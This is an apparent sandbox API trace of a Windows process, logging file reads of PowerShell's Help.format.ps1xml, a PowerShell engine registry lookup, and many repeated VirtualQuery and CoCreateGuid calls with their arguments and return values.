	[0349.306] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.306] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.306] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.307] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.307] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.307] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.307] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.307] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.307] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.307] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.308] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.308] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x1000, lpOverlapped=0x0) returned 1
	[0349.308] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0xf37, lpOverlapped=0x0) returned 1
	[0349.308] ReadFile (in: hFile=0x334, lpBuffer=0x347727f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x347727f*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0349.308] ReadFile (in: hFile=0x334, lpBuffer=0x3477be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd078, lpOverlapped=0x0 | out: lpBuffer=0x3477be0*, lpNumberOfBytesRead=0xcd078*=0x0, lpOverlapped=0x0) returned 1
	[0349.308] CloseHandle (hObject=0x334) returned 1
	[0349.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0349.309] SetErrorMode (uMode=0x1) returned 0x1
	[0349.309] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd020 | out: lpFileInformation=0xcd020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0349.309] SetErrorMode (uMode=0x1) returned 0x1
	[0349.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0349.309] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd108 | out: phkResult=0xcd108*=0x334) returned 0x0
	[0349.309] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd08c, lpData=0x0, lpcbData=0xcd088*=0x0 | out: lpType=0xcd08c*=0x1, lpData=0x0, lpcbData=0xcd088*=0x56) returned 0x0
	[0349.309] CoTaskMemAlloc (cb=0x5a) returned 0x37db50
	[0349.309] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd05c, lpData=0x37db50, lpcbData=0xcd058*=0x56 | out: lpType=0xcd05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd058*=0x56) returned 0x0
	[0349.309] CoTaskMemFree (pv=0x37db50) 
	[0349.309] RegCloseKey (hKey=0x334) returned 0x0
	[0349.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0349.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0349.554] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xdb3f66b9, Data2=0x35cd, Data3=0x4b4a, Data4=([0]=0xbc, [1]=0x22, [2]=0xd8, [3]=0x92, [4]=0x97, [5]=0xc5, [6]=0xf8, [7]=0xaf))) returned 0x0
	[0349.554] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x936fc68c, Data2=0x35cd, Data3=0x4afa, Data4=([0]=0x86, [1]=0x30, [2]=0x94, [3]=0x83, [4]=0x6, [5]=0x3f, [6]=0xca, [7]=0x2b))) returned 0x0
	[0349.594] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xede216a3, Data2=0x3abb, Data3=0x4a7e, Data4=([0]=0x8e, [1]=0x9e, [2]=0xb2, [3]=0xd2, [4]=0x4f, [5]=0xb9, [6]=0x92, [7]=0xc8))) returned 0x0
	[0349.595] VirtualQuery (in: lpAddress=0xcb340, lpBuffer=0xcc200, dwLength=0x30 | out: lpBuffer=0xcc200*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.595] VirtualQuery (in: lpAddress=0xcb3d0, lpBuffer=0xcc290, dwLength=0x30 | out: lpBuffer=0xcc290*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.595] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.595] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.595] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.596] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.596] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.596] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.596] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.596] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.597] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.597] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.597] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.597] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.597] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.597] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.597] VirtualQuery (in: lpAddress=0xcb780, lpBuffer=0xcc640, dwLength=0x30 | out: lpBuffer=0xcc640*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.598] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.598] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.598] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.598] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.598] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0xffdebac7, Data2=0xc7b, Data3=0x4ad5, Data4=([0]=0x8d, [1]=0x72, [2]=0xb4, [3]=0x19, [4]=0xc9, [5]=0x93, [6]=0xf5, [7]=0xb4))) returned 0x0
	[0349.599] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.946] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.946] VirtualQuery (in: lpAddress=0xcbb50, lpBuffer=0xcca10, dwLength=0x30 | out: lpBuffer=0xcca10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.947] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.947] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.947] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.947] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.947] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.948] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.948] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.948] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.948] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.948] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.948] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.948] VirtualQuery (in: lpAddress=0xcb780, lpBuffer=0xcc640, dwLength=0x30 | out: lpBuffer=0xcc640*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.949] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.949] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.949] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.949] VirtualQuery (in: lpAddress=0xcbb40, lpBuffer=0xcca00, dwLength=0x30 | out: lpBuffer=0xcca00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.949] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x3ca773d7, Data2=0xf023, Data3=0x4542, Data4=([0]=0x9f, [1]=0x7e, [2]=0xae, [3]=0x2c, [4]=0xc6, [5]=0x1, [6]=0xda, [7]=0xed))) returned 0x0
	[0349.950] CoCreateGuid (in: pguid=0xcd330 | out: pguid=0xcd330*(Data1=0x82d3bc5a, Data2=0xa548, Data3=0x41a5, Data4=([0]=0x9a, [1]=0xca, [2]=0x97, [3]=0xe3, [4]=0xb7, [5]=0xdc, [6]=0xd3, [7]=0x8c))) returned 0x0
	[0349.950] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.950] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.950] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.951] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.951] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.951] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.951] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.951] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.952] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.952] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.952] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.952] VirtualQuery (in: lpAddress=0xcb1b0, lpBuffer=0xcc070, dwLength=0x30 | out: lpBuffer=0xcc070*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.952] VirtualQuery (in: lpAddress=0xcb240, lpBuffer=0xcc100, dwLength=0x30 | out: lpBuffer=0xcc100*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.953] VirtualQuery (in: lpAddress=0xcbc50, lpBuffer=0xccb10, dwLength=0x30 | out: lpBuffer=0xccb10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.953] VirtualQuery (in: lpAddress=0xcbc50, lpBuffer=0xccb10, dwLength=0x30 | out: lpBuffer=0xccb10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.954] VirtualQuery (in: lpAddress=0xcbc50, lpBuffer=0xccb10, dwLength=0x30 | out: lpBuffer=0xccb10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.954] VirtualQuery (in: lpAddress=0xcbc50, lpBuffer=0xccb10, dwLength=0x30 | out: lpBuffer=0xccb10*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.954] VirtualQuery (in: lpAddress=0xcb340, lpBuffer=0xcc200, dwLength=0x30 | out: lpBuffer=0xcc200*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.954] VirtualQuery (in: lpAddress=0xcb3d0, lpBuffer=0xcc290, dwLength=0x30 | out: lpBuffer=0xcc290*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.954] VirtualQuery (in: lpAddress=0xcbab0, lpBuffer=0xcc970, dwLength=0x30 | out: lpBuffer=0xcc970*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
